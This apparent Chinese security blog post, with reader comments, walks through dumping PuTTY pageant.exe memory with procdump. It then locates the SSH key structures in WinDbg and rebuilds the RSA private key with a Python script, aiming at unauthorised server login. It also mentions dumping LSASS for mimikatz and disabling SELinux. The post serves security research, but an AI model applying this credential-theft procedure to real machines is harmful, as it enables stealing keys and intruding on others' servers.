Memory Dump利用实例


0x00 前言


众所周知,procdump可以获得进程的内存dump文件 最常见的用法如下:

1使用procdump抓取lsass进程
2获得LSASS进程内存dump文件
3用mimikatz解析dump文件
4获取主机明文密码

那么,我们是否可以大胆设想一下,能否使用procdump抓取其他进程内存文件,进而获得内存中的敏感信息呢?

0x01 目标


尝试使用procdump获取putty ssh登录的密钥,实现非授权登录目标Linux服务器

0x02 测试环境


目标:

操作系统:Win7 x86
进程:
    putty.exe: SSH 客户端
    pageant.exe:PuTTY的SSH认证代理,用这个可以不用每次登录输入口令

使用工具:

procdump
windbg 6.3.9600 

0x03 环境搭建


1、工具下载地址:

Putty工具集
http://the.earth.li/~sgtatham/putty/latest/x86/putty.zip

windbg 6.3.9600下载地址:
http://download.csdn.net/detail/ytfrdfiw/8182431

2、主机环境配置

(1)生成密匙

在目标主机运行puttygen.exe,选择需要的密匙类型和长度,使用默认的SSH2(RSA),长度设置为1024 点击Save private key 保存公私钥

如图

(2)上传公钥

登录Linux服务器,然后执行如下命令:

$ cd ~
$ mkdir .ssh
$ chmod 700 .ssh
$ cd .ssh
$ cat > authorized_keys
粘贴公钥
$ chmod 600 authorized_keys

如图

(3)导入私钥实现自动登录

运行pageant导入私钥,运行putty.exe自动登录

如图

Tips:

出现PuTTY:server refused our key无法自动登录的解决方法:

禁用系统的selinux功能,命令#setenforce 0

0x04 实际测试


1、获取进程pageant的内存文件

执行:

Procdump.exe -accepteula -ma pageant.exe lsass5putty.dmp

如图

2、使用WinDBG定位内存文件

使用Windbg加载lsass5putty.dmp文件,alt+5查看内存信息

Tips:

WinDbg需要作如下设置
运行WinDbg->菜单->File->Symbol File Path
 弹出的框中输入“C:\MyCodesSymbols; SRV*C:\MyLocalSymbols*http://msdl.microsoft.com/download/symbols(按照这样设置,WinDbg将先从本地文件夹C:\MyCodesSymbols中查找Symbol,如果找不到,则自动从MS的Symbol Server上下载Symbols,文件夹C:\MyCodesSymbols需要提前建立)
否则会出现ERROR: Symbol file could not be found

(1)查看starting offset

定位00420d2c

如图

说明:

00420d2c为变量ssh2keys固定的起始地址

后面提到的结构体参照源码中的tree234.csshpubk.c文件,

研究具体结构执行过程参照c源码就好

源码下载地址:

http://tartarus.org/~simon/putty-snapshots/putty-src.zip

(2)查看tree234_Tag

定位01361f10

如图

struct tree234_Tag{
    node234 *root=013607c0;
    cmpfn234 cmp=0040f0a5;
};

(3)查看node234_Tag

定位013607c0

如图

struct node234_Tag{
    node234 *parent=00000000;
    node234 *kids[4]={00000000,00000000,00000000,00000000};
    int counts[4]={00000000,00000000,00000000,00000000};
    void *elems[3]={01364fc8,00000000,00000000};
};

(4)查看elems[0]

定位01364fc8

如图

struct ssh2_userkey{
    const struct ssh_signkey *alg=0041c83c;
    void *data=01360b30;
    char *comment=01360858;
};

(5)确认是否找到ssh2_userkey,查看*comment

定位01360858

如图

发现字符rsa-key-20150908

(6)查看RSAKey,即*data

定位01360b30

如图

struct RSAKey{
    int bits=01363f38;
    int bytes=013600c4;
    Bignum modulus=01360b70;
    Bignum exponent=01360b60;
    Bignum private_expinent=01363f38;
    Bignum p=01363fc8;
    Bignum q=01364018;
    Bignum iqmp=01364068;
    char *comment=00000000;
};

(7)获取RSA key

RSA key格式:

Construct an RSA key object from a tuple of valid RSA components.
See RSAImplementation.construct.

Parameters:
 tup (tuple) - A tuple of long integers, with at least 2 and no more than 6 items. The items come in the following order:

 RSA modulus (n).
 Public exponent (e).
 Private exponent (d). Only required if the key is private.
 First factor of n (p). Optional.
 Second factor of n (q). Optional.
 CRT coefficient, (1/p) mod q (u). Optional.
Returns:
 An RSA key object (_RSAobj).

RSA modulus:

定位01360b70

如图

第一位00000020表示读取长度,转为10进制为32,读取长度为32

RSA modulus

004b8e2f be2db5f7 575b3f42 3b9b6774 f0924e40 1418b4a9 7af433cf
4df68526 e2866be4 6ba6a84d b49941c8 ea8462d9 b5ca8e6d 555a0f1b 3b084437
066a5319 65a69b95 c596daa8 ab89949e 1823d812 cdff4adb 6efe09cc 003d765c
925d10c5 2aabc14e 71f7621d fa84e9ed 8d8da1b0 9a156896 c41a0d2f b95f8c7d
5aa2ae5a

Public exponent:

定位01360b60

如图

第一位00000001表示读取长度,转为10进制为1,读取长度为1

Public exponent为0x25

Private exponent:

定位01363f38

如图

第一位00000020表示读取长度,转为10进制为32,读取长度为32

Private exponent为

6c5c9ead 1f5b1e50 47b1b98e 231ed4b9 a2319931 24f1ebda 9650c9fd
44735efe 7dce99ee de1bb6d9 b6e28e4b ad7f096a 0fa86baf 1f9ffb4d de181a88
fedb8599 47efbf03 d4e866c6 04a2da80 6f5aea2a 51acf42f 02fff26d e454b02c
8e558ad4 2aaab232 4159b68b e42d1b14 1f805e50 1fd710aa 88c26f0f 12d911a2
02731978

(8)生成RSA key

import sys
import base64
from Crypto.PublicKey import RSA

def string_to_long(data):
    data = data.split(' ')
    data.reverse()
    return long(("".join(data)),16)

if __name__ == "__main__":
    #setup the primitives
    rsamod = string_to_long('004b8e2f be2db5f7 575b3f42 3b9b6774 f0924e40 1418b4a9 7af433cf 4df68526 e2866be4  6ba6a84d b49941c8 ea8462d9 b5ca8e6d 555a0f1b 3b084437 066a5319 65a69b95 c596daa8 ab89949e 1823d812 cdff4adb 6efe09cc 003d765c 925d10c5 2aabc14e 71f7621d fa84e9ed 8d8da1b0 9a156896 c41a0d2f b95f8c7d 5aa2ae5a')
    rsapubexp = long(0x25)
    rsaprivexp = string_to_long('6c5c9ead 1f5b1e50 47b1b98e 231ed4b9 a2319931 24f1ebda 9650c9fd 44735efe 7dce99ee de1bb6d9 b6e28e4b ad7f096a 0fa86baf 1f9ffb4d de181a88 fedb8599 47efbf03 d4e866c6 04a2da80 6f5aea2a 51acf42f 02fff26d e454b02c 8e558ad4 2aaab232 4159b68b e42d1b14 1f805e50 1fd710aa 88c26f0f 12d911a2 02731978')
    rawkey = (rsamod,rsapubexp,rsaprivexp)
    #construct the desired RSA key
    rsakey = RSA.construct(rawkey)
    #print the object, publickey, privatekey
    print rsakey    
    print rsakey.publickey().exportKey('PEM')
    print rsakey.exportKey('PEM')
    print 'OpenSSH format Public:'
    print rsakey.publickey().exportKey('OpenSSH')

保存为a.py后执行得到公私钥

如图

同puttygen.exe生成的公钥做对比

如图

Tips:

此段python脚本使用print rsakey.publickey().exportKey('OpenSSH')输出验证公钥的正确
私钥无法使用print rsakey.exportKey('OpenSSH')输出

原因如下:

如图

3、利用获取的私钥远程登录

0x05 补充


https://blog.netspi.com/stealing-unencrypted-ssh-agent-keys-from-memory/
http://www.oschina.net/translate/stealing-unencrypted-ssh-agent-keys-from-memory
http://drops.wooyun.org/tips/2719

如上链接,之前有人介绍过“从内存中窃取未加密的SSH-agent密钥”,但该方法是针对linxu环境的内存dump,通过python脚本直接解析 而本文实例是对windows下使用procdump抓取进程内存文件,进而获得内存中的敏感信息的一种尝试探索,全部操作过程完全可以使用一个py文件实现。 参考链接:

http://www.poluoluo.com/server/201107/138424.html
http://blog.sina.com.cn/s/blog_5f5e2ce50101788l.html
https://www.dlitz.net/software/pycrypto/api/current/
https://diablohorn.wordpress.com/2015/09/04/discovering-the-secrets-of-a-pageant-minidump/

0x06 小结


本文仅测试了putty&pageant的内存密钥获取,证明了思路的正确 更多测试持续进行中

本文由三好学生原创并首发于乌云知识库,转载请注明

评论

路人甲 2015-09-11 13:59:26

内存窃取。。

路人甲 2015-09-11 16:04:04

SSL的必要性

独孤小白兔 2016-06-15 15:37:29

mark~

三好学生

good in study,attitude and health

twitter weibo github wechat

随机分类

逻辑漏洞 文章:15 篇
渗透测试 文章:154 篇
Exploit 文章:40 篇
逆向安全 文章:70 篇
安全管理 文章:7 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录